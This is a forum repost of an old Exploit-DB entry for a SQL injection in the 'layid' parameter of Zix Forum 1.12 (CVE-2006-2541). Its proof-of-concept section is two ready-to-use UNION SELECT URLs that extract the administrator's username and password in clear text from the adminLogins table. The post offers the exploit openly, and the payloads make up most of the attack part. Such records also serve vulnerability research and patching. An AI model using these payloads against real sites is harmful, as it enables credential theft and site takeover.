Exploit Zix Forum 1.12 - 'layid' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
1807
Проверка EDB
  1. Пройдено
Автор
FARHADKEY
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
cve-2006-2541
Дата публикации
2006-05-19
Код:
Zix Forum <= 1.12 (layid) SQL Injection Vulnerability


Vulnerability:
--------------------
SQL_Injection:
Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Successful exploitation extracts username and password of administrator in clear text .


Proof of Concepts:
--------------------
site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'

-------

By FarhadKey On 19 May 2006

# milw0rm.com [2006-05-19]
 
Источник
www.exploit-db.com

Похожие темы